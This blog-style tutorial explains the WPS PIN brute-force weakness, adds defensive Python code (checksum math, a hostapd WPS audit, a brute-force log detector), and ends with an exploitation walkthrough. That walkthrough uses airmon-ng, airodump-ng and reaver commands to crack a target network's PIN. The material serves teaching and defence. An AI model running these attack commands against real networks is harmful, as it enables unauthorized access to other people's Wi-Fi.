WPS, or Wi-Fi Protected Setup, is used to automatically configure a wireless network with a Service Set Identifier (SSID), encryption and authentication. It is designed to make setting up a wireless network easy.

WPS can be enabled with two options:

  1. PIN: an eight-digit PIN is entered in the connecting device. This is also called the "external registrar" method.
  2. PBC (Push Button Connect): a physical or virtual button on the router is pushed manually in order to authenticate.

WHY IS WPS USED

  • WPS automatically configures the SSID and required security settings on a network.
  • We do not need to know the security key in order to connect.

ATTACK BACKGROUND

When the PIN authentication fails, the access point sends an EAP-NACK message back to the client. The EAP-NACK messages are sent in a way that lets an attacker determine whether the first half of the PIN is correct on its own. Also, the last digit of the PIN is known because it is a checksum over the other seven digits. This design greatly reduces the number of attempts needed to brute force the PIN: instead of 10^8 attempts for the whole PIN, it takes at most 10^4 attempts for the first half plus 10^3 for the second half, which is 11,000 attempts in total.
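To make that arithmetic concrete, here is an added example (my own code, not from the original post) that implements the WPS PIN checksum as specified in Wi-Fi Simple Configuration, the same check an access point performs on a submitted PIN, and then counts the candidates at each stage of the search. The function names are my own; 12345670 is the PIN hostapd uses as its documentation example.

```python
# Added example: WPS PIN checksum (Wi-Fi Simple Configuration spec) and the
# search-space arithmetic from the text. Function names are the author's own.

def wps_checksum(first_seven: str) -> int:
    """Return the 8th (checksum) digit for the first seven digits of a WPS PIN.

    Odd-position digits are weighted 3, even-position digits 1; the checksum
    digit brings the weighted sum to a multiple of 10.
    """
    if len(first_seven) != 7 or not first_seven.isdigit():
        raise ValueError("need exactly seven digits")
    d = [int(c) for c in first_seven]
    total = 3 * (d[0] + d[2] + d[4] + d[6]) + (d[1] + d[3] + d[5])
    return (10 - total % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True when an 8-digit PIN carries the correct checksum digit.

    This is the verification an access point does before it even starts the
    EAP exchange, so PINs failing it never count as a real attempt.
    """
    if len(pin) != 8 or not pin.isdigit():
        return False
    return wps_checksum(pin[:7]) == int(pin[7])


def naive_search_space() -> int:
    """Eight free digits with no structure known: 10**8 candidates."""
    return 10 ** 8


def second_half_candidates(first_half: str) -> int:
    """Count the 4-digit second halves that pass the checksum for a fixed first half.

    Only 3 of the 4 digits are free (the 4th is the checksum), so the count is
    10**3 regardless of which first half is fixed.
    """
    if len(first_half) != 4 or not first_half.isdigit():
        raise ValueError("first half must be four digits")
    return sum(1 for n in range(10_000) if is_valid_pin(first_half + f"{n:04d}"))


def split_search_space() -> int:
    """Attempts when EAP-NACK reveals whether the first half matched:
    10**4 for the first half, then at most 10**3 for the second half."""
    return 10 ** 4 + 10 ** 3


if __name__ == "__main__":
    print("12345670 valid:", is_valid_pin("12345670"))
    print("naive:", naive_search_space())
    print("split:", split_search_space(), "=", 10 ** 4, "+", second_half_candidates("1234"))
```

The drop from 10^8 to 11,000 is entirely a protocol-design property; the checksum alone only cuts the space by a factor of ten, and it is the half-by-half confirmation through EAP-NACK that does the real damage.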

IMPACT

An attacker within range of the wireless access point may be able to brute force the WPS PIN and retrieve the password for the wireless network, change the configuration of the access point, or cause a denial of service.
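The attack above only works against an access point that accepts PIN-based (external registrar) enrolment. As an added example, not code from the original post, the following script audits a hostapd configuration for the settings that expose that surface. The two config texts are constructed for the example; the option names wps_state, ap_pin, ap_setup_locked and config_methods are real hostapd.conf options, while the parser, the finding texts and the choice of which config_methods count as PIN methods are my own.

```python
# Added example: audit hostapd.conf WPS settings for the PIN attack surface.
# Both sample configs are constructed for this example.

# Weak: WPS on, static AP PIN, external registrars allowed, PIN methods advertised.
WEAK_CONF = """\
interface=wlan0
ssid=SecurityOwls
wps_state=2
ap_pin=12345670
ap_setup_locked=0
config_methods=label display push_button keypad
"""

# Hardened: WPS still on for push-button use, but no static AP PIN, AP setup
# locked against external registrars, and only push-button methods advertised.
HARDENED_CONF = """\
interface=wlan0
ssid=SecurityOwls
wps_state=2
ap_setup_locked=1
config_methods=virtual_push_button physical_push_button
"""

# config_methods values that imply PIN entry or display (author's grouping).
PIN_METHODS = {"label", "display", "keypad", "virtual_display", "physical_display"}


def parse_hostapd(text: str) -> dict:
    """Parse key=value lines of a hostapd.conf, ignoring blanks and comments."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def audit_wps(conf: dict) -> list:
    """Return a list of findings describing WPS PIN exposure (empty = nothing found)."""
    findings = []
    # wps_state=0 (or absent) means WPS is off: nothing to brute force.
    if conf.get("wps_state", "0") == "0":
        return findings
    if "ap_pin" in conf:
        findings.append(
            "static ap_pin set: a fixed AP PIN is exactly what the online brute force recovers"
        )
    # Assumption for this audit: an absent ap_setup_locked is treated as unlocked.
    if conf.get("ap_setup_locked", "0") != "1":
        findings.append("ap_setup_locked is not 1: external registrars may enrol using the AP PIN")
    advertised = set(conf.get("config_methods", "").split()) & PIN_METHODS
    if advertised:
        findings.append("config_methods advertise PIN methods: " + " ".join(sorted(advertised)))
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_wps(parse_hostapd(text)) or ["no findings"])
```

Disabling WPS outright (wps_state=0) is the simplest fix; where push-button pairing is still wanted, the hardened profile keeps PBC and removes the static PIN that the attack targets.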

EXPLOITATION

For this demo I will use two tools, airodump-ng and reaver:

  • airodump-ng is used to scan for available Wi-Fi networks and show other information about them, including whether WPS is enabled.
  • reaver, on the other hand, is used to perform the brute-force attack.

  • Put your Wi-Fi adapter into monitor mode with any one of the following sets of commands:

  1. sudo airmon-ng start <interface name>

  or

  1. sudo ifconfig <interface name> down
  2. sudo iwconfig <interface name> mode monitor
  3. sudo ifconfig <interface name> up

  or

  1. sudo ip link set <interface name> down
  2. sudo iw <interface name> set monitor none
  3. sudo ip link set <interface name> up

To get your Wireless Interface name you can type "iwconfig"

> iwconfig
wlp6s0b1  IEEE 802.11  ESSID:"SecurityOwls"  
          Mode:Managed  Frequency:2.462 GHz  Access Point: xx:xx:xx:xx:xx:xx  
          Bit Rate=57.8 Mb/s   Tx-Power=30 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality=46/70  Signal level=-64 dBm  
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:341  Invalid misc:449   Missed beacon:0

enp7s0    no wireless extensions.

lo        no wireless extensions.

Here you can see that my wireless interface is called wlp6s0b1; yours might be different.

So I will type airmon-ng start wlp6s0b1

  • Start a scan for WPS-enabled networks using airodump-ng (the monitor interface is given as a positional argument; airmon-ng names it wlp6s0b1mon here):
# airodump-ng --wps wlp6s0b1mon

The WPS column shows whether WPS is enabled on each network. Select the BSSID of your target network and feed it to reaver:

reaver -i wlp6s0b1mon -b BSSID -vv

If everything goes fine, reaver will display the WPS PIN of your target network.
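From the access point's side, the attack just described looks like a long run of failed WPS registrations in a short time, which is easy to spot. As an added example, not part of the original post, here is a small detector that runs over constructed event lines in the style of hostapd's WPS-FAIL / WPS-SUCCESS events (the exact line layout, timestamps and MAC addresses are made up for the example) and raises an alert per station, plus an all-stations count to cover a client that rotates its MAC address between attempts. Thresholds and function names are my own.

```python
# Added example: detect a WPS PIN brute force from AP-side event lines.
# Log format and contents are constructed for this example.
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: one station fails six times in ten seconds (brute force),
# another fails once and then succeeds (a user mistyping a PIN).
SAMPLE_LOG = """\
2024-05-01T10:00:00 wlan0 WPS-FAIL sta=02:aa:bb:cc:dd:01
2024-05-01T10:00:02 wlan0 WPS-FAIL sta=02:aa:bb:cc:dd:01
2024-05-01T10:00:04 wlan0 WPS-FAIL sta=02:aa:bb:cc:dd:01
2024-05-01T10:00:06 wlan0 WPS-FAIL sta=02:aa:bb:cc:dd:01
2024-05-01T10:00:08 wlan0 WPS-FAIL sta=02:aa:bb:cc:dd:01
2024-05-01T10:00:10 wlan0 WPS-FAIL sta=02:aa:bb:cc:dd:01
2024-05-01T10:30:00 wlan0 WPS-FAIL sta=02:aa:bb:cc:dd:02
2024-05-01T10:30:01 wlan0 WPS-SUCCESS sta=02:aa:bb:cc:dd:02
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ifname>\S+) (?P<event>WPS-\S+) sta=(?P<sta>[0-9a-f:]{17})$"
)


def parse_events(text: str):
    """Yield (timestamp, event, station MAC) for each well-formed line; skip the rest."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        yield datetime.fromisoformat(m["ts"]), m["event"], m["sta"]


def detect_wps_bruteforce(text: str, threshold: int = 5, window_s: int = 60) -> dict:
    """Map station MAC -> time of first alert, for stations with at least
    `threshold` WPS-FAIL events inside any `window_s`-second sliding window."""
    window = timedelta(seconds=window_s)
    recent = defaultdict(deque)  # per-station timestamps still inside the window
    alerts = {}
    for ts, event, sta in parse_events(text):
        if event != "WPS-FAIL":
            continue
        q = recent[sta]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and sta not in alerts:
            alerts[sta] = ts
    return alerts


def max_failures_in_window(text: str, window_s: int = 60) -> int:
    """Largest number of WPS-FAIL events from any stations inside one window.

    Counting across all MACs catches a client that changes its address
    between attempts to stay under the per-station threshold.
    """
    window = timedelta(seconds=window_s)
    times = sorted(ts for ts, event, _ in parse_events(text) if event == "WPS-FAIL")
    best = start = 0
    for end, ts in enumerate(times):
        while ts - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


if __name__ == "__main__":
    for sta, when in detect_wps_bruteforce(SAMPLE_LOG).items():
        print(f"ALERT {when.isoformat()} WPS PIN brute force from {sta}")
    print("peak WPS failures in any 60 s window:", max_failures_in_window(SAMPLE_LOG))
```

A real deployment would feed the detector from the AP's control interface or syslog rather than a string, and the same per-window failure count is also the signal on which an access point should lock PIN-based WPS after a handful of failures.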